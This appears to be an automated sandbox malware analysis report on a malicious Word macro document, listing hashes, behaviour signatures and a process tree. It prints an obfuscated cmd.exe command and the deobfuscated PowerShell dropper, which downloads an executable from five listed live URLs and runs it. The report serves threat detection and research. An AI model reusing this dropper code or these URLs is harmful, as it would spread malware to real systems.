Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

c06a2e5abd...18.doc

windows7-x64

10

c06a2e5abd...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    101s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    25/08/2024, 09:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc

  • Size

    137KB

  • MD5

    c06a2e5abd9ac5e50c7e1acc180fa4e2

  • SHA1

    51bf7e1cac1e7f64289051b7a891804e1577ff51

  • SHA256

    5f50deac85a3e3e51cb6c6d7f8fa81f1e426281225e8e685c90a32f23c8b15d8

  • SHA512

    811ca504c7ae4b2b0dc20c374c467ba330a27805008b700022c22f43909406de463944d5d6c0ff09ac4985c50551d1d3c5aff157f603d85014f0fa89ab1d39ae

  • SSDEEP

    1536:mFM5O81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9cX9jvVJZeI:G8GhDS0o9zTGOZD6EbzCdqX9DVuI

Score
10/10
discoveryexecution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.exclusivetvlnet.com/eb1o4
exe.dropper

http://rashmigupta.com/eU6
exe.dropper

http://dellaconnor.com/6uHd8l
exe.dropper

http://whitecertifiedangusbeef.com/eLUIv5P2
exe.dropper

http://aidspolicyproject.org/u

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c06a2e5abd9ac5e50c7e1acc180fa4e2_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2524
      • \??\c:\windows\SysWOW64\cmd.exe
        c:\EDNsvwVDCMikH\SwsEwVtYlcJbX\VPzVzwLs\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;63;18;46;67;22;9;8;46;60;26;27;29;51;61;8;74;40;77;26;26;11;53;75;75;17;17;17;63;46;36;33;9;62;58;8;59;46;26;59;9;60;46;26;63;33;55;32;75;46;67;39;55;71;47;77;26;26;11;53;75;75;10;66;58;77;32;8;24;62;11;26;66;63;33;55;32;75;46;52;45;47;77;26;26;11;53;75;75;76;46;9;9;66;33;55;60;60;55;10;63;33;55;32;75;45;62;5;76;41;9;47;77;26;26;11;53;75;75;17;77;8;26;46;33;46;10;26;8;51;8;46;76;66;60;24;62;58;67;46;46;51;63;33;55;32;75;46;50;52;28;59;23;30;72;47;77;26;26;11;53;75;75;66;8;76;58;11;55;9;8;33;54;11;10;55;14;46;33;26;63;55;10;24;75;62;40;63;68;11;9;8;26;57;40;47;40;20;27;29;49;6;65;74;40;58;52;70;40;27;29;37;58;76;44;74;44;40;39;73;69;40;27;29;32;38;28;74;40;38;52;11;40;27;29;34;6;4;74;29;46;60;59;53;26;46;32;11;31;40;21;40;31;29;37;58;76;31;40;63;46;36;46;40;27;51;55;10;46;66;33;77;57;29;18;12;37;44;8;60;44;29;51;61;8;20;35;26;10;54;35;29;0;17;38;63;56;55;17;60;9;55;66;76;61;8;9;46;57;29;18;12;37;64;44;29;34;6;4;20;27;29;4;65;33;74;40;11;77;55;40;27;28;51;44;57;57;7;46;26;48;28;26;46;32;44;29;34;6;4;20;63;9;46;60;24;26;77;44;48;24;46;44;41;43;43;43;43;20;44;35;28;60;59;55;6;46;48;28;26;46;32;44;29;34;6;4;27;29;76;37;22;74;40;8;17;67;40;27;67;10;46;66;6;27;25;25;33;66;26;33;77;35;25;25;29;42;62;32;74;40;34;14;62;40;27;78)do set XA=!XA!!h7:~%M,1!&&if %M geq 78 powershell.exe "!XA:~4!""
        2⤵
        • Process spawned unexpected child process
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\SysWOW64\cmd.exe
          CmD /V:/C"set h7=TrWpZHkGilrpENjqKwWB)\C5g}t;I$P+mcO{xJA1'8Y0 6e@-RLfU:yoD(svnFu.,zabS7V429=/dh&&for %M in (29;37;49;14;74;40;58;12;12;40;27;29;0;17;38;74;60;46;17;48;55;67;14;46;33;26;44;13;46;26;63;18;46;67;22;9;8;46;60;26;27;29;51;61;8;74;40;77;26;26;11;53;75;75;17;17;17;63;46;36;33;9;62;58;8;59;46;26;59;9;60;46;26;63;33;55;32;75;46;67;39;55;71;47;77;26;26;11;53;75;75;10;66;58;77;32;8;24;62;11;26;66;63;33;55;32;75;46;52;45;47;77;26;26;11;53;75;75;76;46;9;9;66;33;55;60;60;55;10;63;33;55;32;75;45;62;5;76;41;9;47;77;26;26;11;53;75;75;17;77;8;26;46;33;46;10;26;8;51;8;46;76;66;60;24;62;58;67;46;46;51;63;33;55;32;75;46;50;52;28;59;23;30;72;47;77;26;26;11;53;75;75;66;8;76;58;11;55;9;8;33;54;11;10;55;14;46;33;26;63;55;10;24;75;62;40;63;68;11;9;8;26;57;40;47;40;20;27;29;49;6;65;74;40;58;52;70;40;27;29;37;58;76;44;74;44;40;39;73;69;40;27;29;32;38;28;74;40;38;52;11;40;27;29;34;6;4;74;29;46;60;59;53;26;46;32;11;31;40;21;40;31;29;37;58;76;31;40;63;46;36;46;40;27;51;55;10;46;66;33;77;57;29;18;12;37;44;8;60;44;29;51;61;8;20;35;26;10;54;35;29;0;17;38;63;56;55;17;60;9;55;66;76;61;8;9;46;57;29;18;12;37;64;44;29;34;6;4;20;27;29;4;65;33;74;40;11;77;55;40;27;28;51;44;57;57;7;46;26;48;28;26;46;32;44;29;34;6;4;20;63;9;46;60;24;26;77;44;48;24;46;44;41;43;43;43;43;20;44;35;28;60;59;55;6;46;48;28;26;46;32;44;29;34;6;4;27;29;76;37;22;74;40;8;17;67;40;27;67;10;46;66;6;27;25;25;33;66;26;33;77;35;25;25;29;42;62;32;74;40;34;14;62;40;27;78)do set XA=!XA!!h7:~%M,1!&&if %M geq 78 powershell.exe "!XA:~4!""
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2276
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe "$JRj='sEE';$TwA=new-object Net.WebClient;$fFi='http://www.exclusivetvlnet.com/eb1o4@http://rashmigupta.com/eU6@http://dellaconnor.com/6uHd8l@http://whitecertifiedangusbeef.com/eLUIv5P2@http://aidspolicyproject.org/u'.Split('@');$Rkz='sUV';$Jsd = '197';$mAI='AUp';$OkZ=$env:temp+'\'+$Jsd+'.exe';foreach($WEJ in $fFi){try{$TwA.DownloadFile($WEJ, $OkZ);$Zzc='pho';If ((Get-Item $OkZ).length -ge 80000) {Invoke-Item $OkZ;$dJC='iwb';break;}}catch{}}$Yum='Oju';"
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2616

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      19KB

      MD5

      15bceb3e4605f6768299b8294733c9fb

      SHA1

      c7f7ab44bbb4b3c5ff2d9caca81956f47d7bcd49

      SHA256

      49b1c9503cbc808b38ebd33f5e4d919375c05981239713b366e89158344d42b4

      SHA512

      a73ef5f6742da7c8ee21dfd16971c553665dbdc0fc2d3097bf4634c151c8ff2c89688dadc0682f2167e4efd2eacff056c85322b1fe464b6baa9d80f272d7e8fd

      Download Submit

    • memory/2180-6-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-2-0x000000007155D000-0x0000000071568000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2180-4-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-8-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-9-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-0-0x000000002F771000-0x000000002F772000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2180-7-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-13-0x000000007155D000-0x0000000071568000-memory.dmp

      Filesize

      44KB

      Download

    • memory/2180-14-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-15-0x0000000000550000-0x0000000000650000-memory.dmp

      Filesize

      1024KB

      Download

    • memory/2180-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2180-30-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2180-31-0x000000007155D000-0x0000000071568000-memory.dmp

      Filesize

      44KB

      Download